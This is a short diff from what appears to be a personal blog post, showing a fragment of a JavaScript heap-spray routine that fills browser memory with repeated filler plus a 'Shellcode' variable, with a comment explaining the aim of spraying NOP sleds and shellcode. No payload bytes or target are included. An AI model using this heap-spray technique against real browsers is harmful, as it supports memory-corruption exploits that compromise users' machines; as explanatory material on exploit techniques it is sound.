wrn14897/myBlog/blog/2018-12-31/index.md

       while (chunk.length + slack < 0x40000) chunk = chunk + chunk + filler;
       var memory = new Array();
-      for (i = 0; i < 500; i++){ memory[i] = chunk + Shellcode }
+      // The goal is to fill the heap with sequences of NOP's + Shellcode. for (i = 0; i < 500; i++){ memory[i] = chunk + Shellcode }

       alert("allocation done");